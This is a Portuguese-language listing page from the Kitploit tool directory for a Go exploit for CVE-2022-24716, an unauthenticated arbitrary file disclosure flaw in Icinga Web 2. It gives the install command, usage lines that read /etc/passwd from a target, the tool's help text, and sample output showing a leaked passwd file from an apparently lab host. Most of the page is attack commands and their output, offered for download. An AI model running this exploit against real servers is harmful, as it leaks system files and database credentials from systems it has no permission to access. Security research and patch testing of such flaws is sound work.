Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24716-2 — CVE-2022-24716 (Divulgação Arbitrária de Arquivos Icingaweb2) | Kitploit
Ferramentas/GitHubGitHub/gmh5225/cve-2022-24716-2
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (Divulgação Arbitrária de Arquivos Icingaweb2)

Ver Repositório
12há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-24716

Icinga Web 2 é uma interface web de monitoramento de código aberto, um framework e uma interface de linha de comando. Usuários não autenticados podem vazar o conteúdo de arquivos locais do sistema acessíveis ao usuário a partir do servidor web, incluindo arquivos de configuração do icingaweb2 com credenciais de banco de dados.

  • Instalação
  • Uso
  • Executando CVE-2022-24716

Instalação

O CVE-2022-24716 requer golang e, para baixá-lo, basta usar:

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Uso

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

Isso exibirá a ajuda da ferramenta. Aqui estão todas as opções que ela suporta:

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Executando CVE-2022-24716

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
Baixar ferramenta